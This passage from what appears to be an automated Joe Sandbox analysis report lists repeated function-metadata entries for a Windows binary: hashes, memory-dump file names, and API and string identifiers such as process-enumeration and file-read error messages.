                                                                                                                  • Opcode Fuzzy Hash: 56e6ba89d370b9234b5a5992d3a7c8533a6698b1ea8b213f9a8009716b16c25b
                                                                                                                  • Instruction Fuzzy Hash: 0BF08150B1C61381FE55B756E8005B56251BF4EBD0F584432DD5CCBBB6EE2CE9568310
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                  • Opcode ID: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
                                                                                                                  • Instruction ID: 69212dd602f67136d918ad03503068f5743d8d2e29b3459047b50041e14000af
                                                                                                                  • Opcode Fuzzy Hash: 3568a673c23024b7a528510d4250d5925bf8b2663cdb265cd0b878eaba4c314f
                                                                                                                  • Instruction Fuzzy Hash: 95F01D91B0C60385FA64B768D8D417812A1AF4F748F506531C54EC6ABBDE3CE984C304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                  • Opcode ID: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
                                                                                                                  • Instruction ID: 5d4c6e83e818c50aab9d647f617d9fd46f01df580c87b8dc81117b8b9917fafc
                                                                                                                  • Opcode Fuzzy Hash: 92e1423703d3c376117564a88a64444d1e0736b766f2c3370c2fe957f1c671d4
                                                                                                                  • Instruction Fuzzy Hash: B0F01D91B0C60385FA64B768D8D417812A1AF4F748F506432C50EC6ABBDE3CE984C304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                  • Opcode ID: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
                                                                                                                  • Instruction ID: 9f9ffbf233207499a47c915557fff774d79150c4e3f169efc69d1016c9ea0f23
                                                                                                                  • Opcode Fuzzy Hash: bc6c4c71623ff024deb327412966a9805aff51230ecb063eae95e275db5d3ab1
                                                                                                                  • Instruction Fuzzy Hash: 2FF01D91B0C60385FA64B768D8D417812A1AF4F749F506531C50EC6ABBEE3CE984C304
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseErrorHandleLastNextProcess32
                                                                                                                  • String ID: [E] (%s) -> Process32Next failed(gle=%lu)$block_app
                                                                                                                  • API String ID: 1692733154-1215713629
                                                                                                                  • Opcode ID: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
                                                                                                                  • Instruction ID: daf9491c0b71d172740f06461ea421ab39dd6318ec70bd39cdc8b5d4aa838462
                                                                                                                  • Opcode Fuzzy Hash: 92e34874ae0ae98bf0a884f1fef47379aa5eb378dcd3c69f1e14fabf6c69f307
                                                                                                                  • Instruction Fuzzy Hash: BEF01D91B0C60385FA64B768D8D417812A1AF4F748F506432C50EC6ABBDE3CE984C704
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                  • Opcode ID: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
                                                                                                                  • Instruction ID: 72fe7ccc8b44d0f084db2495598c23b579550297e7519924a3ab571bc4fe6229
                                                                                                                  • Opcode Fuzzy Hash: bc9657a6dfdbcedde1d2fd3d6a88db9a33a45d1f6bb91b054f3284ed97a3b4ff
                                                                                                                  • Instruction Fuzzy Hash: 11F05E10F1E61B40FE55BB56EC405B02250AF1FBD4B482531CC2DD7B73ED1CA5968310
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
                                                                                                                  • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
                                                                                                                  • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
                                                                                                                  • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
                                                                                                                  • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
                                                                                                                  • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
                                                                                                                  • Opcode Fuzzy Hash: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction Fuzzy Hash: CEF05E23B0C20351F992BA69F4417BD12512F8E765E4A1536CD6CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction ID: ac61f1081a1543cb7b3b3d49ec47d6bb89a66236b290778e49c4a238f751cb13
                                                                                                                  • Opcode Fuzzy Hash: ed571756588594b7e354bc46fc8b0e358fa8a783f3935751d38bca4c76fa4898
                                                                                                                  • Instruction Fuzzy Hash: EAF05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction ID: ea937c98fd522ef77df8b19c2cd2bf04e968d66506248e9205fb5c2fad4356ef
                                                                                                                  • Opcode Fuzzy Hash: cf8c6abc46baf002a4b94b128b505ab6eae422338a24bf55f2c9fb19bdd33895
                                                                                                                  • Instruction Fuzzy Hash: 7CF05E23B0C20351F992BA69F4407BD52512F8E765E4A1536CD5CCBBE3EE3DA8878210
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction ID: 769905a02f93f4641b0fa277ade33fa2edf65550ec77602944cc6a91a029ed31
                                                                                                                  • Opcode Fuzzy Hash: d400ccc41f07d85efbaf118e831595e6118f2ccae4f921d648a8b05ec38435d3
                                                                                                                  • Instruction Fuzzy Hash: AFF05E23B0C20351F992BA69F4407BD12512F8E761E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction ID: 29ae5b9a9fc11dc39a275a538e1ae2b7df3e3f448d2934274b8c77f8e487061f
                                                                                                                  • Opcode Fuzzy Hash: 1644c6a3bca8c6556b5bd2b4bce9513eb849d7e55eeff9f3b8f38a9682788697
                                                                                                                  • Instruction Fuzzy Hash: A4F05E23B0C20351F992BA69F4407BD12512F8E765E4A1536CD5CCBBE3EE3DA8878200
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000005.00000002.1754943118.00007FF64B931000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF64B930000, based on PE: true
                                                                                                                  • Associated: 00000005.00000002.1754924040.00007FF64B930000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754977678.00007FF64B941000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1754997476.00007FF64B942000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755019915.00007FF64B94A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755047466.00007FF64B94C000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000005.00000002.1755066070.00007FF64B94F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_5_2_7ff64b930000_cwjk513wjc7a1mlgh3.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: fclose
                                                                                                                  • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                                                                                  • API String ID: 3125558077-1073242539
                                                                                                                  • Opcode ID: f4a81eb148b4fd358aa1d1a0855e8f9eee4966889b0d0a29dc5ee9e6c4fc2afa
                                                                                                                  • Instruction ID: 8a30ba5028368a2d64a71a5336cbb639696dbe2fe864b7a0b5a8a411139bc4a8
